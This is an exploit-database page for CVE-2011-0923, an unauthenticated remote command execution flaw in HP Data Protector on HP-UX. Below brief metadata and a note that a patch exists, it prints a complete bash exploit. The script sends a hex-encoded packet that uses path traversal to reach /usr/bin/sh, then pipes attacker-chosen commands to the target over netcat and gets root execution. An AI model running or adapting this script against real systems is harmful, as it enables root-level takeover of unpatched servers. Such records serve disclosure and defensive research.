header-logo
Suggest Exploit
vendor:
Data Protector
by:
Adrian Puente Z.
9.3
CVSS
HIGH
Remote Shell
287
CWE
Product Name: Data Protector
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: YES
Related CWE: CVE-2011-0923
CPE: a:hp:data_protector
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: HPUX
2011

HP Data Protector Remote Shell for HPUX

This exploit allows an attacker to execute arbitrary commands on a vulnerable HP Data Protector system running on HPUX. The vulnerability is due to a lack of authentication when sending specially crafted packets to the Data Protector service. An attacker can exploit this vulnerability to execute arbitrary commands with root privileges.

Mitigation:

HP has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/bin/bash 
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ 
# Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com 
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks 
# Lots of thanks to David Llorens (@c4an) for all the help. 
# Ported to HPUX from fdisk's (@fdiskyou) Windows version. 
# Windows version: http://www.exploit-db.com/exploits/17339/ 
#
# 
# Shouts to shellhellboy, r3x, r0d00m, etlow,  
# psymera, nitr0us and ppl in #mendozaaaa 
# 
#

[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` <host> <port> <commands>\n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)
" && exit 0

HOST=`echo ${@} | awk '{print $1}'`
PORT=`echo ${@} | awk '{print $2}'`
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}